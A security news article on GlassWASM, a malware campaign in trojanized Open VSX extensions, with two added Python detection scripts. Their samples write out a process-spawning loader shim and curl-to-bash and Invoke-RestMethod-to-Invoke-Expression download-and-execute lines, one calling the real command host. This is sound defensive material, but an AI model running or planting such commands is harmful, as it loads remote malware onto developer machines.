Security researchers have uncovered GlassWASM malware, a stealthy threat hiding inside trojanized Visual Studio Code extensions. Socket’s Threat Research team spotted the campaign on the Open VSX marketplace. Moreover, the attackers wrapped their logic in WebAssembly and leaned on the Solana blockchain to dodge detection. As a result, ordinary scanners largely miss it.
Two Trojanized Open VSX Extensions
Socket identified two malicious package versions on Open VSX. They are exargd/vsblack@0.0.1 and noellee-doc/flint-debug@0.1.1. Furthermore, a single account named zaitoona43 uploaded both within two days. That GitHub account was only three days old at publication.

These carriers are not typosquats. Instead, they clone legitimate, verified VS Code Marketplace extensions down to the publisher ID, version, and repo links. According to Socket, this is “identity impersonation that exploits a cross-registry trust gap, not typosquatting.” Consequently, a developer browsing Open VSX sees details that match the trusted original.
Why the targets matter
The cloned debugger themes its interface around blockchain “transaction” debugging. Therefore, it blends naturally with the payload’s crypto-developer focus. Open VSX also serves as the default registry for VSCodium, Cursor, Windsurf, and Gitpod. So the blast radius reaches well beyond stock VS Code.
WebAssembly as an Evasion Layer
The payload ships as a TinyGo-compiled WebAssembly module. Notably, it carries no readable URLs, commands, or wallet strings. Instead, every meaningful string sits encrypted under ChaCha20 and rebuilds only in memory at runtime. Because of this, signature and YARA rules keyed on text simply will not fire.
Socket frames the takeaway bluntly. The team notes that “WebAssembly in an npm package is a high-signal artifact.” In short, a .wasm blob plus a small JS shim deserves the same scrutiny as heavily obfuscated script.
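The static heuristic Socket describes, a .wasm module shipped beside a small JavaScript shim that instantiates it and reaches for child_process, can be turned into a package triage check. The script below is an added example written for this article, not Socket's tooling; it builds two constructed extension trees (one matching the pattern, one benign) in temporary directories and reports what it finds. File names, the `sample-ext` package name and the placeholder module bytes are all constructed.

```python
"""Static triage of an unpacked VS Code / Open VSX extension for the
GlassWASM shape: a .wasm module beside a JS shim that loads it and can
spawn OS processes. Added example for this article, not Socket's code."""
import re
import tempfile
from pathlib import Path

# Markers a loader shim needs: instantiating a module and running commands.
WASM_LOADER_RE = re.compile(r"WebAssembly\.(instantiate|compile)(Streaming)?\s*\(")
CHILD_PROCESS_RE = re.compile(r"""require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]""")
SPAWN_RE = re.compile(r"\b(exec|execSync|execFile|spawn|spawnSync)\s*\(")
WASM_MAGIC = b"\x00asm"  # every WebAssembly binary starts with these bytes


def printable_ratio(data: bytes) -> float:
    """Share of printable ASCII bytes. A module whose strings are encrypted
    at rest has little readable text; this is a heuristic, not a verdict."""
    if not data:
        return 0.0
    return sum(32 <= b < 127 for b in data) / len(data)


def triage_extension(root: str) -> dict:
    """Walk an unpacked extension and report .wasm modules and loader shims."""
    root_path = Path(root)
    wasm_modules = []
    for p in root_path.rglob("*.wasm"):
        data = p.read_bytes()
        wasm_modules.append({
            "path": str(p.relative_to(root_path)),
            "valid_magic": data.startswith(WASM_MAGIC),
            "printable_ratio": round(printable_ratio(data), 3),
        })
    shims = []
    for js in root_path.rglob("*.js"):
        text = js.read_text(errors="ignore")
        loads_wasm = bool(WASM_LOADER_RE.search(text))
        spawns = bool(CHILD_PROCESS_RE.search(text) and SPAWN_RE.search(text))
        if loads_wasm or spawns:
            shims.append({"path": str(js.relative_to(root_path)),
                          "loads_wasm": loads_wasm, "spawns_processes": spawns})
    # High signal: a bundled module plus a shim that both loads it and can spawn.
    high_signal = bool(wasm_modules) and any(
        s["loads_wasm"] and s["spawns_processes"] for s in shims)
    return {"wasm_modules": wasm_modules, "shims": shims, "high_signal": high_signal}


# Constructed sample trees (not real packages). The shim mirrors the shape the
# article describes: load a module, then hand its output to child_process.
SUSPICIOUS_SHIM = """\
const fs = require('fs');
const { execSync } = require('child_process');
const bytes = fs.readFileSync(__dirname + '/core.wasm');
WebAssembly.instantiate(bytes, {}).then(({ instance }) => {
  // command text is produced inside the module at runtime, not stored here
  execSync(instance.exports.buildCommand(), { windowsHide: true });
});
"""
BENIGN_EXTENSION = """\
const vscode = require('vscode');
exports.activate = (ctx) => {
  ctx.subscriptions.push(vscode.commands.registerCommand('demo.hello', () => {
    vscode.window.showInformationMessage('hello');
  }));
};
"""
# Placeholder module: valid header followed by non-text filler bytes.
FAKE_WASM = WASM_MAGIC + b"\x01\x00\x00\x00" + bytes(range(256)) * 8


def build_suspicious_extension(root: str) -> None:
    Path(root, "package.json").write_text('{"name": "sample-ext", "main": "./out/extension.js"}')
    out = Path(root, "out")
    out.mkdir()
    (out / "extension.js").write_text(SUSPICIOUS_SHIM)
    (out / "core.wasm").write_bytes(FAKE_WASM)


def build_benign_extension(root: str) -> None:
    Path(root, "package.json").write_text('{"name": "sample-ext", "main": "./extension.js"}')
    Path(root, "extension.js").write_text(BENIGN_EXTENSION)


def demo() -> dict:
    """Build both constructed trees in temp dirs and triage each."""
    results = {}
    for name, builder in (("suspicious", build_suspicious_extension),
                          ("benign", build_benign_extension)):
        with tempfile.TemporaryDirectory() as tmp:
            builder(tmp)
            results[name] = triage_extension(tmp)
    return results


if __name__ == "__main__":
    for name, report in demo().items():
        print(name, "->", "HIGH SIGNAL" if report["high_signal"] else "no finding", report)
```

Point `triage_extension` at an unpacked `.vsix` (it is a zip) or an `~/.vscode/extensions/<id>` directory; the low printable ratio on the module is only supporting evidence, since legitimate WebAssembly is also mostly non-text, so the decisive combination is module plus a shim that both loads it and spawns processes.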
Solana Blockchain as a C2 Dead-Drop
Rather than hardcoding a server, GlassWASM reads its orders off the public Solana blockchain. First, it polls an attacker-controlled wallet for recent transactions. Then it extracts the C2 host from the SPL Memo field attached to those transactions. Researchers resolved the live memo to the host dodod[.]lat.
This design is deliberately resilient. The wallet stays fixed, yet the operator can rotate servers by simply posting a new memo. Meanwhile, the JSON-RPC traffic blends with any legitimate app that reads Solana state.
Cross-Platform Download-and-Execute
Once the host resolves, the module builds an OS-specific command. On macOS and Linux, it runs curl piped into bash. On Windows, it runs Invoke-RestMethod piped into Invoke-Expression. Node’s child_process then executes the command with the console window hidden.
This is a classic fileless loader. Because the second stage arrives at runtime, its capability stays open-ended: an infostealer, a wallet drainer, or another loader. At analysis time, however, the host did not yet serve payloads, so the operator’s ultimate intent remains unconfirmed.
Ties to the GlassWorm Campaign
Socket attributes GlassWASM to the GlassWorm developer with medium confidence. The dead-drop mechanism, the runtime-decrypted loader, and the Open VSX delivery all match prior GlassWorm tradecraft. However, the WebAssembly packaging marks a clear pivot toward binary loading for obfuscation.
Importantly, the host dodod[.]lat and the watched wallet are net-new indicators. Therefore, defenders should treat both as fresh, actionable IOCs.
Defending Against GlassWASM
Socket reported the packages, and the Open VSX team removed them quickly. Still, several practical defenses remain. First, block and hunt for dodod[.]lat and the watched wallet address. Second, build EDR rules for Node processes spawning bash, curl, or PowerShell. Third, flag any npm or extension package that bundles a .wasm file beside a JS loader.
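The first two defenses above, an indicator hunt and a rule for Node or editor processes spawning shells and downloaders, can be expressed as a small detection that runs over process-creation telemetry. The code below is an added example for this article, not a rule from Socket or any EDR vendor. The event records are constructed, the field names (`parent_image`, `image`, `command_line`) are an assumed schema, and the parent process list is an assumption to adapt to your environment; the only page-sourced value is the dodod[.]lat host, refanged for matching.

```python
"""Detection over process-creation events for the GlassWASM execution
pattern: an extension host spawning a shell or downloader that pipes remote
content into an interpreter, plus a hunt for the article's C2 host.
Added example for this article, not a vendor rule."""
import re
from typing import Dict, List

# Assumed parent process names for the Node runtime and Open VSX-based editors.
EXTENSION_HOST_PARENTS = {"node", "node.exe", "code", "code.exe",
                          "codium", "cursor", "windsurf"}
SHELL_OR_DOWNLOADER = {"bash", "sh", "zsh", "curl",
                       "powershell", "powershell.exe", "pwsh", "pwsh.exe"}

# Network indicator from the article (dodod[.]lat), refanged for matching.
KNOWN_C2_HOSTS = {"dodod.lat"}

# The two download-and-execute shapes the article describes.
UNIX_PIPE_RE = re.compile(r"curl\b.*\|\s*(ba|z)?sh\b", re.IGNORECASE)
WIN_PIPE_RE = re.compile(r"Invoke-RestMethod\b.*\|\s*(Invoke-Expression|iex)\b", re.IGNORECASE)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def basename(image: str) -> str:
    """Normalise a Windows or POSIX image path to a lowercase file name."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate_event(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event triggers (empty = benign)."""
    hits: List[str] = []
    parent = basename(event.get("parent_image", ""))
    child = basename(event.get("image", ""))
    cmd = event.get("command_line", "")

    if parent in EXTENSION_HOST_PARENTS and child in SHELL_OR_DOWNLOADER:
        hits.append("editor_spawns_shell_or_downloader")
    if UNIX_PIPE_RE.search(cmd) or WIN_PIPE_RE.search(cmd):
        hits.append("remote_content_piped_to_interpreter")
    hosts = {h.lower() for h in HOST_RE.findall(cmd)}
    if hosts & KNOWN_C2_HOSTS:
        hits.append("known_glasswasm_c2_host")
    return hits


def evaluate(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each event id to the rules it triggered."""
    return {e["id"]: evaluate_event(e) for e in events}


# Constructed sample telemetry; hosts other than the article's IOC are placeholders.
SAMPLE_EVENTS = [
    {"id": "e1", "parent_image": "/usr/local/bin/node", "image": "/bin/bash",
     "command_line": 'bash -c "curl -fsSL http://dodod.lat/s | bash"'},
    {"id": "e2", "parent_image": r"C:\Program Files\nodejs\node.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -c "Invoke-RestMethod http://example.invalid/s | Invoke-Expression"'},
    {"id": "e3", "parent_image": "/usr/local/bin/node", "image": "/usr/bin/git",
     "command_line": "git status --porcelain"},
    {"id": "e4", "parent_image": "/bin/bash", "image": "/usr/bin/curl",
     "command_line": "curl -sS https://registry.npmjs.org/left-pad"},
]

if __name__ == "__main__":
    for event_id, hits in evaluate(SAMPLE_EVENTS).items():
        print(event_id, hits or "benign")
```

The behavioural rules fire without any indicator knowledge, which matters because the operator can rotate the host by posting a new Solana memo; the indicator match is there so the current host is still caught and so the two signals can be weighted differently in triage. Expect the parent-child rule alone to need tuning, since developers legitimately run shells from editor tasks and terminals, so the pipe-to-interpreter pattern should carry the higher severity.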
Finally, anyone who activated either extension should assume the second stage ran. Accordingly, rotate developer, CI, cloud, and npm credentials reachable from that host. GlassWASM malware shows how blockchain dead-drops and WebAssembly together push supply-chain attacks past traditional detection.